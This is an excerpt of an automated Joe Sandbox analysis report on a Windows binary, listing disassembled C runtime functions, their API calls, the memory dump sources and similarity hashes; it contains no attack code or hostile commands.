• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ddb41ff6124d86a6e36ac08eaac4bdb840b9b5c50bb73a3832cdfa69e9a25c91
• Instruction ID: 15ba6abbd8db3345adcbbda54d2645a20ac357a50868277dd810dfe7608eea8c
• Opcode Fuzzy Hash: ddb41ff6124d86a6e36ac08eaac4bdb840b9b5c50bb73a3832cdfa69e9a25c91
• Instruction Fuzzy Hash: 6C219F32600215AF9B21EF71CD81E6A77A9FF44368714A91DF825B7351EB32ED038791
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00EDE533
  • Part of subcall function 00ED7491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ED8CE1,?,00000000,-00000008), ref: 00ED74F2
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EDE56B
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EDE58B
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
• Opcode ID: 525bcf610b571ba788fee61b8bc12346990498b9be0549b62cb06ad2a0de62e2
• Instruction ID: d91e2b4ebd4c7f00a9eaa3f45ca20c4a7a758a39368e73bda5d1fb9bb9e5f677
• Opcode Fuzzy Hash: 525bcf610b571ba788fee61b8bc12346990498b9be0549b62cb06ad2a0de62e2
• Instruction Fuzzy Hash: CA118BB1905255BE672537766C8ECBF6A9CDF883EC710202AF841B9341FA20DE4292B1
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00EC16BD
• GetCurrentThreadId.KERNEL32 ref: 00EC16CB
• std::_Throw_Cpp_error.LIBCPMT ref: 00EC16E4
• std::_Throw_Cpp_error.LIBCPMT ref: 00EC1723
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$CurrentThread
• String ID:
• API String ID: 2261580123-0
• Opcode ID: ef7cfd8afb03168c140b080900f1812be139d7edda010cb360779e3a2061c72b
• Instruction ID: 45f4588f042a13730dc6a4fd73e1aefb1fde306a28f23c2f59869149e72d251f
• Opcode Fuzzy Hash: ef7cfd8afb03168c140b080900f1812be139d7edda010cb360779e3a2061c72b
• Instruction Fuzzy Hash: 4521EAB4E042098FCB08EF98D695BADBBF1BF49304F01946DE449BB351DB359942CB51
APIs
• __EH_prolog3.LIBCMT ref: 00ECAA68
• std::_Lockit::_Lockit.LIBCPMT ref: 00ECAA72
  • Part of subcall function 00EC4080: std::_Lockit::_Lockit.LIBCPMT ref: 00EC40AE
  • Part of subcall function 00EC4080: std::_Lockit::~_Lockit.LIBCPMT ref: 00EC40D9
• codecvt.LIBCPMT ref: 00ECAAAC
• std::_Lockit::~_Lockit.LIBCPMT ref: 00ECAAE3
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
• Opcode ID: f1cf432f05d996fa560af5dd8308e4b7cca674fd99b3122c69b537d58ba993e4
• Instruction ID: add35ea93a2fd1a64f2f184ac83a1d9165f59b0f17c3c79dc62d42247c406c30
• Opcode Fuzzy Hash: f1cf432f05d996fa560af5dd8308e4b7cca674fd99b3122c69b537d58ba993e4
• Instruction Fuzzy Hash: F901A5B19002199FCB05EB64DA16FBEB7B5AF80314F29111DE411772D2DF729E06C781
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00EE554F,00000000,00000001,00000000,?,?,00EDF6FB,?,00000000,00000000), ref: 00EE6077
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00EE554F,00000000,00000001,00000000,?,?,00EDF6FB,?,00000000,00000000,?,?,?,00EDF041,00000000), ref: 00EE6083
                                                                                                                                                                                                                                                                    • Part of subcall function 00EE60D4: CloseHandle.KERNEL32(FFFFFFFE,00EE6093,?,00EE554F,00000000,00000001,00000000,?,?,00EDF6FB,?,00000000,00000000,?,?), ref: 00EE60E4
                                                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 00EE6093
                                                                                                                                                                                                                                                                    • Part of subcall function 00EE60B5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EE6051,00EE553C,?,?,00EDF6FB,?,00000000,00000000,?), ref: 00EE60C8
                                                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00EE554F,00000000,00000001,00000000,?,?,00EDF6FB,?,00000000,00000000,?), ref: 00EE60A8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: d38cb1ae185ed039cd4ef41e136da6bc3124e61f9ae7bc50267e9c5eaa0ad680
• Instruction ID: 7a2f0bafa3e235cc52063bc91ffad357b15881495e120fdea40ab09b954d3d79
• Opcode Fuzzy Hash: d38cb1ae185ed039cd4ef41e136da6bc3124e61f9ae7bc50267e9c5eaa0ad680
• Instruction Fuzzy Hash: 7FF01236801169BFCF722F92DC089993F65FB943A0F008010FA19A5162D7318920DB91
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: _strcspn
• String ID: @
• API String ID: 3709121408-2766056989
• Opcode ID: 66d39e71585a43a837da086547208115b54ba167827c0f483ce21c86d4d99220
• Instruction ID: 3e14b8d5424633c258814a703d6dc35b3d2f89ead05e272b3c618e61be91ba4b
• Opcode Fuzzy Hash: 66d39e71585a43a837da086547208115b54ba167827c0f483ce21c86d4d99220
• Instruction Fuzzy Hash: 4C32C3B49042698FCB14DF24C981BDEBBF1BF49300F0585AEE899A7311D731AA85CF91
APIs
  • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
  • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00ED19AE,?,?,?,00000055,?,-00000050,?,?,?), ref: 00EDBDD4
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00ED19AE,?,?,?,00000055,?,-00000050,?,?), ref: 00EDBE0B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLast$CodePageValid
• String ID: utf8
• API String ID: 943130320-905460609
• Opcode ID: eccc00039029685c97f52c9ddd01e53f3ba411fb11ee58beebe6701e5ff6b14e
• Instruction ID: 853bbb4923a9ed64f6b9e12bc96ba43800193eefe6d5a78d075064beb04baff2
• Opcode Fuzzy Hash: eccc00039029685c97f52c9ddd01e53f3ba411fb11ee58beebe6701e5ff6b14e
• Instruction Fuzzy Hash: 4A51B771B00306EAE724AB318C82BBA73E9EF44744F16642BF955B7381FB70D9428765
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00ED6CFF,?,?,00000000,00000000,00000000,?), ref: 00ED6E23
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 6e4674b952c113e64c88412477475d5b1a2261c3f2e87467e3fc5794546010c3
• Instruction ID: 1c09e155d17312a1692376881eee10b29e2be070a2ca054302b18625be207d14
• Opcode Fuzzy Hash: 6e4674b952c113e64c88412477475d5b1a2261c3f2e87467e3fc5794546010c3
• Instruction Fuzzy Hash: 5F416A72A00209AFCF15DF98DD81AAEBBB5FF48308F14505AF914B7251D3359A52DB60
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 00ED68E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                  • Opcode ID: c551890dc65e75ed34179e6ab7c5200fb19cddc015b91c2ebb1b59f386fbde5d
                                                                                                                                                                                                                                                                  • Instruction ID: f84134ad6bd1223e6bde0e9a9fe6b683e0f8b7c29e4aed3de8f071ede89e3d58
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c551890dc65e75ed34179e6ab7c5200fb19cddc015b91c2ebb1b59f386fbde5d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5031E732400218DFCF268F54CD549AA7B66FF89329B18616BF95469321D332DC63DF81
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ECB1A0
                                                                                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00ECB288
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                  • String ID: (9
                                                                                                                                                                                                                                                                  • API String ID: 3761405300-3464744488
                                                                                                                                                                                                                                                                  • Opcode ID: f5dc37cb27692b757428cc8ff63a6170f13b1f2b35ae1f0661040fa69a6bbecd
                                                                                                                                                                                                                                                                  • Instruction ID: f66cc1756fa94e74e0e9f95ed1bfa1ce6ecb4c6bc759488c97f9928b8c5acc89
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5dc37cb27692b757428cc8ff63a6170f13b1f2b35ae1f0661040fa69a6bbecd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E2116B4611B409FD314DF27ED86660BBE4BBC8310F10941AE549BB7B1E3B19689CF44
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ECB0C3
                                                                                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00ECB180
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                  • String ID: (9
                                                                                                                                                                                                                                                                  • API String ID: 3761405300-3464744488
                                                                                                                                                                                                                                                                  • Opcode ID: c424c69c1dbda239a78d9ebdd00364d348f33ec1c3427b223be4a7ad1768c63d
                                                                                                                                                                                                                                                                  • Instruction ID: 375246b8a5fe5cbdb5bb40adc7ba22960ab44582eadcef19f52b7f7c101686ec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c424c69c1dbda239a78d9ebdd00364d348f33ec1c3427b223be4a7ad1768c63d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3711C3B4612A449FC310DF3BED81660BBA8BBC8310B00905AE489A7B71E3B19749CF45
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00EC44B2
                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00EC44FC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
                                                                                                                                                                                                                                                                  • String ID: ,B
                                                                                                                                                                                                                                                                  • API String ID: 3286764726-2268942197
                                                                                                                                                                                                                                                                  • Opcode ID: 0a0a569afa2ccf16c67d749b0042258d6f93e047f7faa45b9a297a34e7e36040
                                                                                                                                                                                                                                                                  • Instruction ID: b58cc686e3c166383ee3ba0d175d8da8eb238eea3776121b2b8f8288ce15bd62
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a0a569afa2ccf16c67d749b0042258d6f93e047f7faa45b9a297a34e7e36040
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06F0BD709105089BCB08FBE9E5B6B6DBBB1AF40308F44116CD10677387DE319E92C755